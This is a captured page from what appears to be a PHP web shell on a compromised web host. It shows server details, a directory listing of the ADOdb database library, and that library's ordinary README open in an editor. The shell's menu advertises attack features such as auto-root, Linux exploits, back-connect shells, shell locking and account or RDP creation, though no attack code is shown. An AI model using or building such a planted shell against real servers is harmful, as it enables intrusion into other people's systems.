Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.90
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
lib /
adodb /
[ HOME SHELL ]
Name
Size
Permission
Action
datadict
[ DIR ]
drwxr-xr-x
drivers
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
perf
[ DIR ]
drwxr-xr-x
xsl
[ DIR ]
drwxr-xr-x
LICENSE.md
25.79
KB
-rw-r--r--
README.md
4.06
KB
-rw-r--r--
adodb-active-record.inc.php
28.18
KB
-rw-rw-r--
adodb-active-recordx.inc.php
37.74
KB
-rw-rw-r--
adodb-csvlib.inc.php
8.11
KB
-rw-rw-r--
adodb-datadict.inc.php
28.68
KB
-rw-rw-r--
adodb-error.inc.php
8.91
KB
-rw-rw-r--
adodb-errorhandler.inc.php
2.77
KB
-rw-rw-r--
adodb-errorpear.inc.php
2.29
KB
-rw-rw-r--
adodb-exceptions.inc.php
2.27
KB
-rw-rw-r--
adodb-iterator.inc.php
779
B
-rw-rw-r--
adodb-lib.inc.php
36.4
KB
-rw-rw-r--
adodb-loadbalancer.inc.php
24.56
KB
-rw-rw-r--
adodb-memcache.lib.inc.php
5.9
KB
-rw-rw-r--
adodb-pager.inc.php
7.93
KB
-rw-rw-r--
adodb-pear.inc.php
9.35
KB
-rw-rw-r--
adodb-perf.inc.php
30.52
KB
-rw-rw-r--
adodb-php4.inc.php
413
B
-rw-rw-r--
adodb-time.inc.php
42.53
KB
-rw-rw-r--
adodb-xmlschema.inc.php
53.26
KB
-rw-rw-r--
adodb-xmlschema03.inc.php
60.72
KB
-rw-rw-r--
adodb.inc.php
143.81
KB
-rw-rw-r--
index.html
0
B
-rw-r--r--
pivottable.inc.php
6.16
KB
-rw-rw-r--
readme_moodle.txt
936
B
-rw-rw-r--
rsfilter.inc.php
1.55
KB
-rw-rw-r--
toexport.inc.php
3.37
KB
-rw-rw-r--
tohtml.inc.php
5.53
KB
-rw-rw-r--
xmlschema.dtd
1.42
KB
-rw-r--r--
xmlschema03.dtd
1.64
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
ADOdb Library for PHP ====================== [](https://gitter.im/adodb/adodb?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [](https://sourceforge.net/projects/adodb/files/latest/download) (c) 2000-2013 John Lim (jlim@natsoft.com) (c) 2014 Damien Regad, Mark Newnham and the [ADOdb community](https://github.com/ADOdb/ADOdb/graphs/contributors) The ADOdb Library is dual-licensed, released under both the [BSD 3-Clause](https://github.com/ADOdb/ADOdb/blob/master/LICENSE.md#bsd-3-clause-license) and the [GNU Lesser General Public Licence (LGPL) v2.1](https://github.com/ADOdb/ADOdb/blob/master/LICENSE.md#gnu-lesser-general-public-license) or, at your option, any later version. This means you can use it in proprietary products; see [License](https://github.com/ADOdb/ADOdb/blob/master/LICENSE.md) for details. Home page: https://adodb.org/ Introduction ============ PHP's database access functions are not standardized. This creates a need for a database class library to hide the differences between the different databases (encapsulate the differences) so we can easily switch databases. The library currently supports MySQL, Firebird & Interbase, PostgreSQL, SQLite3, Oracle, Microsoft SQL Server, Foxpro ODBC, Access ODBC, Informix, DB2, Sybase, Sybase SQL Anywhere, generic ODBC and Microsoft's ADO. We hope more people will contribute drivers to support other databases. Installation ============ Unpack all the files into a directory accessible by your web server. To test, try modifying some of the tutorial examples. Make sure you customize the connection settings correctly. You can debug using: ``` php <?php include('adodb/adodb.inc.php'); $db = adoNewConnection($driver); # eg. 'mysqli' or 'oci8' $db->debug = true; $db->connect($server, $user, $password, $database); $rs = $db->execute('select * from some_small_table'); print "<pre>"; print_r($rs->getRows()); print "</pre>"; ``` Documentation and Examples ========================== Refer to the [ADOdb website](https://adodb.org/) for library documentation and examples. The documentation can also be [downloaded for offline viewing](https://sourceforge.net/projects/adodb/files/Documentation/). - [Main documentation](https://adodb.org/dokuwiki/doku.php?id=v5:userguide:userguide_index): Query, update and insert records using a portable API. - [Data dictionary](https://adodb.org/dokuwiki/doku.php?id=v5:dictionary:dictionary_index) describes how to create database tables and indexes in a portable manner. - [Database performance monitoring](https://adodb.org/dokuwiki/doku.php?id=v5:performance:performance_index) allows you to perform health checks, tune and monitor your database. - [Database-backed sessions](https://adodb.org/dokuwiki/doku.php?id=v5:session:session_index). There is also a [tutorial](https://adodb.org/dokuwiki/doku.php?id=v5:userguide:mysql_tutorial) that contrasts ADOdb code with PHP native MySQL code. Files ===== - `adodb.inc.php` is the library's main file. You only need to include this file. - `adodb-*.inc.php` are the database specific driver code. - `adodb-session.php` is the PHP4 session handling code. - `test.php` contains a list of test commands to exercise the class library. - `testdatabases.inc.php` contains the list of databases to apply the tests on. - `Benchmark.php` is a simple benchmark to test the throughput of a SELECT statement for databases described in testdatabases.inc.php. The benchmark tables are created in test.php. Support ======= To discuss with the ADOdb development team and users, connect to our [Gitter chatroom](https://gitter.im/adodb/adodb) using your Github credentials. Please report bugs, issues and feature requests on Github: https://github.com/ADOdb/ADOdb/issues You may also find legacy issues in - the [SourceForge tickets section](http://sourceforge.net/p/adodb/_list/tickets) However, please note that they are not actively monitored and should only be used as reference.
Close